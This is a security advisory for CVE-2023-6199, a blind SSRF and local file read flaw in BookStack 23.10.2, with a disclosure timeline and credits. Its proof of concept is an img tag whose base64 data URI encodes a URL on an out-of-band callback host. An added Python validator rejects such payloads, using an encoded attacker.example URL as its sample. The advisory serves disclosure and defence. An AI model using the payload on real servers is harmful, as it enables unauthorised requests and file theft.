Book Stack v23.10.2 - LFR via Blind SSRF

Summary

Name: Book Stack v23.10.2 - LFR via Blind SSRF
Code name:
Product: Book Stack
Affected versions: Version 23.10.2
State: Public
Release date: 2023-11-20

Vulnerability

Kind: Server-side request forgery (SSRF)
Rule:
Remote: Yes
CVSSv3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
CVSSv3.1 Base Score: 7.1
Exploit available: No
CVE ID(s): CVE-2023-6199

Description

Book Stack version 23.10.2 allows an attacker to read local files on the server (local file read, LFR). This is possible because the application is vulnerable to SSRF.

Vulnerability

A server-side request forgery (SSRF) vulnerability has been identified in Book Stack that, under certain conditions, could allow an attacker to obtain local files from the server. The attacker must have writer permissions in the application.

POC

<!--
1. OOB: interactsh-client -v => clc2nf2q8vb4audkj6ngndxkxg7c7y1pj.oast.site
2. Craft payload: https://clc2nf2q8vb4audkj6ngndxkxg7c7y1pj.oast.site/image.png | base64 => aHR0cHM6Ly9jbGMybmYycTh2YjRhdWRrajZuZ25keGt4ZzdjN3kxcGoub2FzdC5zaXRlL2ltYWdlLnBuZw
3. Exploit => <img src='data:image/png;base64,[BASE64 HERE]'/>
-->
<img src='data:image/png;base64,aHR0cHM6Ly9jbGMybmYycTh2YjRhdWRrajZuZ25keGt4ZzdjN3kxcGoub2FzdC5zaXRlL2ltYWdlLnBuZw'/>

Evidence of exploitation

Our security policy

We have reserved the ID CVE-2023-6199 to refer to this issue from now on.

System Information

  • Version: Book Stack 23.10.2

  • Operating System: MacOS

Mitigation

An updated version of BookStack is available at the vendor page.
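The PoC above works because the base64 body of a data:image URI is decoded and handed to server-side image handling without checking that it is actually image data. The following validator, an added example that is not BookStack's own code, shows the kind of check a server should apply before it touches inline image content: it accepts only declared PNG/JPEG/GIF data URIs whose decoded bytes begin with the matching magic signature, so a base64-encoded URL or path (the sample URL below is a constructed placeholder) is rejected before any fetch or file access can happen.

```python
import base64
import binascii
import re

# Allow-list of accepted image types and their magic bytes (constructed).
IMAGE_SIGNATURES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# Only data URIs of an accepted image type with a base64 body are considered.
DATA_URI_RE = re.compile(r"^data:image/(png|jpeg|gif);base64,(.+)$", re.DOTALL)


def decode_image_data_uri(uri: str) -> bytes:
    """Return the raw image bytes of an inline data URI, or raise ValueError.

    Checks, in order: the URI grammar, strict base64 decoding, and that the
    decoded bytes start with the signature of the declared image type.
    Anything else, including a URL or file path hidden in the base64 body,
    is rejected before it can reach code that might open or fetch it.
    """
    match = DATA_URI_RE.match(uri)
    if not match:
        raise ValueError("not an accepted data:image URI")
    kind, payload = match.group(1), match.group(2)
    try:
        raw = base64.b64decode(payload, validate=True)
    except binascii.Error as exc:
        raise ValueError("invalid base64 body") from exc
    if not raw.startswith(IMAGE_SIGNATURES[kind]):
        raise ValueError(f"decoded content is not a {kind} image")
    return raw


def is_safe_image_data_uri(uri: str) -> bool:
    """True only when the URI passes every check in decode_image_data_uri."""
    try:
        decode_image_data_uri(uri)
        return True
    except ValueError:
        return False


# Constructed samples: a minimal PNG-signature payload, and a base64-encoded
# URL of the same shape as the PoC (placeholder host, not the real one).
SAMPLE_PNG_URI = "data:image/png;base64," + base64.b64encode(
    IMAGE_SIGNATURES["png"] + b"\x00" * 8).decode()
SAMPLE_URL_URI = "data:image/png;base64," + base64.b64encode(
    b"https://attacker.example/image.png").decode()
```

Running `is_safe_image_data_uri` over both samples accepts the PNG and rejects the encoded URL; the same check applied at save time also serves as a detection for existing pages containing such payloads.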

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://github.com/BookStackApp/BookStack/

BookStack release https://www.bookstackapp.com/blog/bookstack-release-v23-10-3/

Timeline

2023-11-17: Vulnerability discovered.

2023-11-18: Vendor contacted.

2023-11-19: Vendor replied acknowledging the report.

2023-11-19: Vendor confirmed the vulnerability.

2023-11-20: Vulnerability patched.

2023-11-20: Public disclosure.
